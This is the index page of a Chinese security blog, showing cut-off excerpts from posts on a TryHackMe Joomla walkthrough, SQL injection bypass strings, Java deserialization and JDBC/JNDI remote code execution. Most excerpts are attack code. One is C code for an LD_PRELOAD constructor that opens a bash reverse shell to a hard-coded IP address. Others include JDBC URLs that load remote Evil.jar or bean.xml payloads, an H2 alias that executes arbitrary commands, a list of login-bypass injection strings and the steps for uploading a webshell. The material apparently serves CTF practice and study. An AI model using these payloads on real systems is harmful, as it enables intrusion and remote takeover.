MoonlitSyntax

daily Bugle
daily Bugle
发表于 | TryHackMe
有点难绷 房间太乱了吧 看起来又是80打22 © 2024 The Daily Bugle 开搜 扫描目录 是一个joomla joomscan -u http://10.10.198.118 扫出版本是3.7.0 OK下一步search一下 是个时间盲注 直接偷脚本吧 wget https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py hashes拿到密码spiderman123 账号是jonah 登录后台 template -> beez3 -> error.php 传个马 http://10.10.198.118/templates/beez3/error.php 访问后弹回shell 信息搜集 cat config*<?phpclass JConfig { public $offline = '0'; public $offline_message = 'This site is down ...
防
发表于 | ctf
awd中一些防御手段
无题
无题
发表于
import java.io.*;import java.lang.reflect.Field;import java.lang.reflect.InvocationTargetException;import java.lang.reflect.Method;import java.util.HashMap;import java.util.Map;/** * 参考p神:https://mp.weixin.qq.com/s/fcuKNfLXiFxWrIYQPq7OCg * 参考1ue:https://t.zsxq.com/17LkqCzk8 * 实现:参考 OObjectOutputStream# protected void writeClassDescriptor(ObjectStreamClass desc)方法 */public class CustomObjectOutputStream extends ObjectOutputStream { public CustomObjectOutputStream(OutputStream out) throws ...
无题
无题
发表于
' or 1='1'or'='or'adminadmin'--admin' or 4=4--admin' or '1'='1'--admin888"or "a"="aadmin' or 2=2#a' having 1=1#a' having 1=1--admin' or '2'='2')or('a'='aor 4=4--ca'or' 4=4--"or 4=4--'or'a'='a"or"="a'='a'or''=''or'='or'1 or '1'='1'=11 or &#x ...
无题
无题
发表于
#define _GNU_SOURCE#include<stdlib.h>#include<stdio.h>#include<string.h>__attribute__ ((__constructor__)) void preload (void){ unsetenv("LD_PRELOAD"); system(" bash -c 'bash -i >& /dev/tcp/165.154.5.221/9999 0>&1' ");} 下面这个爽了 #include <stdio.h>#include <unistd.h>#include <sys/types.h>#include <sys/socket.h>#include <arpa/inet.h>#include <signal.h>#include <dirent.h>#include <sys/s ...
无题
无题
发表于
ref.add(new StringRefAddr("initConnectionSqls", "CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8000/Evil.jar', 'APP.Sample3', 0);CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample3');CREATE PROCEDURE SALES.TOTAL_REVENUES1() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'Evil.exec';CALL SALES.TOTAL_REVENUES1();")); 注意一下变量名,用过了记得删掉或者换个名字 或者直接换个数据库
无题
无题
发表于
socketFactory/socketFactoryArg RCE package com.javasec.jdbc.postgres;import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class PsqlJDBCRCE { public static void main(String[] args) throws SQLException { String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext"; String socketFactoryArg = "http://127.0.0.1:8000/bean.xml"; String jdbcUrl = "jdbc:postgresql://127 ...
无题
无题
发表于
搭建好环境之后 alias //创建别名CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;//调用SHELLEXEC执行命令CALL SHELLEXEC('id');CALL SHELLEXEC('whoami'); init 初始化的时候指定链接 jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql' 这是 ...
无题
无题
发表于
-84和-19是反序列化数据,直接就readObject了 其中ServerStatusDiffInterceptor是一个拦截器,在JDBC URL中设定属性queryInterceptors为ServerStatusDiffInterceptor时,执行查询语句会调用拦截器的preProcess和postProcess方法,进而通过上述调用链最终调用getObject()方法 String DB_URL = "jdbc:mysql://127.0.0.1:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true";//8.x使用
无题
无题
发表于
低版本 攻击者控制LDAP服务端返回一个恶意jndi Reference对象,并且LDAP服务的Reference远程加载Factory类并不是使用RMI Class Loader机制,因此不受trustURLCodebase限制。 没有环境就简单看一遍 LADP服务的Reference对象引用的获取和jndi注入中的不太一样,jndi是通过ReferenceWrapper_Stub对象的getReference方法获取reference对象,而LADP服务是根据传入的属性构造一个新的reference对象引用,接着获取了第6个属性并判断是否为空,如果第6个属性为null则直接返回新的reference对象引用。 高版本绕过
无题
无题
发表于
初探 ref为空 需要 obj 既不是 Reference 也不是 Referenceable 无法实例化远程对象,没用 令 ref.getFactoryClassLocation() 返回空,这个属性表示引用所指向对象的对应 factory 名称,对于远程代码加载而言是 codebase,即远程代码的 URL 地址,如果对应factory是本地代码,则该值为空 对于方法二,只需要在远程 RMI 服务器返回的 Reference 对象中不指定 Factory 的 codebase javax.naming.spi.NamingManager 解析过程中 如果本地拿到了工厂类,就不需要远程加载,直接本地实例化工厂,再用工厂实例化类返回 于是找到Tomcat里的BeanFactory 他使用newInstance创建实例 只能调用无参构造 找到的是ELProcessor和GroovyShell 基于BeanFactory javax.management.loading.MLet jdk自带 MLet 继承自 URLClassloader,有一个无参构造方法,还有一个 add ...
无题
无题
发表于
禁用了 没有启用该 disallow-doctype-decl 功能或禁用 external-general-entities 和 external-parameter-entities 可以html编码绕过 ban了四个类 这个2006年的类 哥们,这你能发现 还有一条? SerializableRenderedImage#readObject -> SerializableRenderedImage#decodeRasterFromByteArray -> RawTileDecoder#decode -> ObjectInputStream#readObect 没找到啊 decode确实在 直接就读了,调用decode的SerializableRenderedImage#decodeRasterFromByteArray我好像没找到 找到了 java conf目录下有 jdk.serialFilter=!javax.management.BadAttributeValueExpException;!su ...
avatar
dionysus
我醉欲眠卿且去
文章
306
标签
10
分类
8
此心安处
公告
最新文章
离开贴吧
离开贴吧
有点难受
有点难受
梦
复习一下反序列化 cc1-cc7
复习一下反序列化 cc1-cc7
Fastjson
Fastjson
分类
标签
awdMacwebtoolsjavanodejspython审计sqlxss
归档